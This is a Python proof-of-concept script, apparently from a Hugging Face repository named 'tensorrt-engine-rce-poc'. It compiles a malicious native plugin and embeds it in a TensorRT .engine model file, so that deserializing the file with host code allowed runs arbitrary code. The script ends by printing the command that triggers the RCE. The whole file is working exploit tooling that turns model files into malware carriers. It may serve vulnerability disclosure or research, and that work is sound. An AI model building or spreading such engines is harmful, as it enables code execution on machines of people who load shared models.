tensorrt-engine-rce-poc / build_poc.py
treforbenbow's picture
Upload build_poc.py with huggingface_hub
9f36fb4 verified
#!/usr/bin/env python3
"""
PoC Builder: Creates a malicious TensorRT engine file with embedded native code.
This script:
1. Compiles a malicious DLL/SO with code that executes on load
2. Builds a TensorRT engine embedding the malicious library
3. The resulting .engine file triggers arbitrary code execution when deserialized
Usage: python build_poc.py
"""
import os
import sys
import subprocess
import tempfile
import struct
import platform
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PROJECT_DIR = os.path.dirname(SCRIPT_DIR)
EVIDENCE_DIR = os.path.join(PROJECT_DIR, "evidence")
os.makedirs(EVIDENCE_DIR, exist_ok=True)
def find_msvc():
"""Find MSVC cl.exe on Windows."""
import glob
patterns = [
r"C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe",
r"C:\Program Files (x86)\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe",
]
for pattern in patterns:
matches = glob.glob(pattern)
if matches:
return sorted(matches)[-1] # Latest version
return None
def find_msvc_env():
"""Find vcvarsall.bat to set up MSVC environment."""
import glob
patterns = [
r"C:\Program Files\Microsoft Visual Studio\*\*\VC\Auxiliary\Build\vcvarsall.bat",
r"C:\Program Files (x86)\Microsoft Visual Studio\*\*\VC\Auxiliary\Build\vcvarsall.bat",
]
for pattern in patterns:
matches = glob.glob(pattern)
if matches:
return sorted(matches)[-1]
return None
def compile_dll_windows(source_path: str, output_path: str) -> bool:
"""Compile the malicious plugin as a Windows DLL using MSVC."""
vcvarsall = find_msvc_env()
if not vcvarsall:
print("[!] Could not find vcvarsall.bat")
return False
# Use cmd.exe to run vcvarsall then compile
output_dir = os.path.dirname(output_path)
basename = os.path.splitext(os.path.basename(output_path))[0]
cmd = f'"{vcvarsall}" x64 && cl.exe /LD /Fe:"{output_path}" "{source_path}" /link /DLL'
print(f"[*] Compiling DLL: {cmd}")
result = subprocess.run(
["cmd.exe", "/c", cmd],
capture_output=True, text=True,
cwd=output_dir
)
if result.returncode != 0:
print(f"[!] Compilation failed:\n{result.stderr}\n{result.stdout}")
return False
if os.path.exists(output_path):
print(f"[+] DLL compiled: {output_path} ({os.path.getsize(output_path)} bytes)")
return True
print("[!] DLL file not found after compilation")
return False
def compile_so_linux(source_path: str, output_path: str) -> bool:
"""Compile the malicious plugin as a Linux .so using gcc."""
cmd = ["gcc", "-shared", "-fPIC", "-o", output_path, source_path, "-Wl,--no-as-needed"]
print(f"[*] Compiling: {' '.join(cmd)}")
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode != 0:
print(f"[!] Compilation failed: {result.stderr}")
return False
print(f"[+] SO compiled: {output_path} ({os.path.getsize(output_path)} bytes)")
return True
def build_engine(plugin_path: str, engine_path: str) -> bool:
"""Build a TensorRT engine with the malicious plugin embedded."""
try:
import tensorrt as trt
except ImportError:
print("[!] TensorRT not installed: pip install tensorrt")
return False
print(f"[*] TensorRT version: {trt.__version__}")
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
# Create builder and network
builder = trt.Builder(TRT_LOGGER)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
)
config = builder.create_builder_config()
# Minimal identity network
inp = network.add_input("input", trt.DataType.FLOAT, (1, 3, 224, 224))
identity = network.add_identity(inp)
identity.get_output(0).name = "output"
network.mark_output(identity.get_output(0))
# CRITICAL: Embed the malicious plugin into the engine file
# This serializes the entire binary content of the DLL/SO into the .engine file.
# When loaded with engine_host_code_allowed=True, TensorRT extracts and LoadLibrary/dlopen's it.
plugin_path_abs = os.path.abspath(plugin_path)
print(f"[*] Embedding plugin: {plugin_path_abs}")
print(f"[*] Plugin size: {os.path.getsize(plugin_path_abs)} bytes")
config.plugins_to_serialize = [plugin_path_abs]
print("[*] Building serialized network...")
serialized = builder.build_serialized_network(network, config)
if serialized is None:
print("[!] Engine build failed (build_serialized_network returned None)")
print("[!] This may indicate the plugin library format is incompatible")
return False
engine_bytes = bytes(serialized)
with open(engine_path, "wb") as f:
f.write(engine_bytes)
print(f"[+] Engine saved: {engine_path}")
print(f"[+] Engine size: {len(engine_bytes)} bytes")
# Verify the plugin binary is embedded in the engine
with open(plugin_path_abs, "rb") as f:
plugin_bytes = f.read()
if plugin_bytes[:64] in engine_bytes:
print(f"[+] CONFIRMED: Plugin binary content found embedded in engine file")
else:
print("[*] Note: Plugin may be stored in a transformed format within the engine")
return True
def try_version_compatible_engine(engine_path: str) -> bool:
"""
Alternative: Build a version-compatible engine that embeds the lean runtime.
This demonstrates that even WITHOUT custom plugins, the engine format
can carry executable code (the lean runtime itself).
"""
try:
import tensorrt as trt
except ImportError:
return False
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
builder = trt.Builder(TRT_LOGGER)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
)
config = builder.create_builder_config()
inp = network.add_input("input", trt.DataType.FLOAT, (1, 3, 224, 224))
identity = network.add_identity(inp)
identity.get_output(0).name = "output"
network.mark_output(identity.get_output(0))
# Enable version-compatible mode — this embeds libnvinfer_lean into the engine
try:
config.set_flag(trt.BuilderFlag.VERSION_COMPATIBLE)
print("[*] Building version-compatible engine (embeds lean runtime)...")
serialized = builder.build_serialized_network(network, config)
if serialized:
engine_bytes = bytes(serialized)
vc_path = engine_path.replace(".engine", "_version_compatible.engine")
with open(vc_path, "wb") as f:
f.write(engine_bytes)
print(f"[+] Version-compatible engine: {vc_path} ({len(engine_bytes)} bytes)")
print(f"[+] This engine embeds the lean runtime (~40MB of native code)")
return True
except Exception as e:
print(f"[*] Version-compatible build not supported: {e}")
return False
def main():
print("=" * 70)
print("TensorRT Engine File RCE PoC Builder")
print("=" * 70)
print()
source_path = os.path.join(SCRIPT_DIR, "malicious_plugin.c")
if not os.path.exists(source_path):
print(f"[!] Plugin source not found: {source_path}")
sys.exit(1)
is_windows = platform.system() == "Windows"
# Step 1: Compile the malicious plugin
print("[*] Phase 1: Compiling malicious plugin...")
if is_windows:
plugin_path = os.path.join(EVIDENCE_DIR, "malicious_plugin.dll")
success = compile_dll_windows(source_path, plugin_path)
else:
plugin_path = os.path.join(EVIDENCE_DIR, "libmalicious_plugin.so")
success = compile_so_linux(source_path, plugin_path)
if not success:
print("[!] Plugin compilation failed")
sys.exit(1)
# Step 2: Build engine with embedded plugin
print()
print("[*] Phase 2: Building TensorRT engine with embedded malicious code...")
engine_path = os.path.join(EVIDENCE_DIR, "malicious_model.engine")
success = build_engine(plugin_path, engine_path)
if not success:
print()
print("[!] Engine build with embedded plugin failed.")
print("[*] Trying alternative: version-compatible engine...")
print()
try_version_compatible_engine(engine_path)
# Step 3: Also try version-compatible engine as additional evidence
print()
print("[*] Phase 3: Attempting version-compatible engine build (additional evidence)...")
try_version_compatible_engine(engine_path)
print()
print("=" * 70)
print("[*] PoC Build Complete")
print(f"[*] Evidence directory: {EVIDENCE_DIR}")
print(f"[*] Plugin: {plugin_path}")
if os.path.exists(engine_path):
print(f"[*] Engine: {engine_path}")
print()
print("[*] To trigger RCE, run:")
print(f" python load_poc.py \"{engine_path}\"")
print("=" * 70)
if __name__ == "__main__":
main()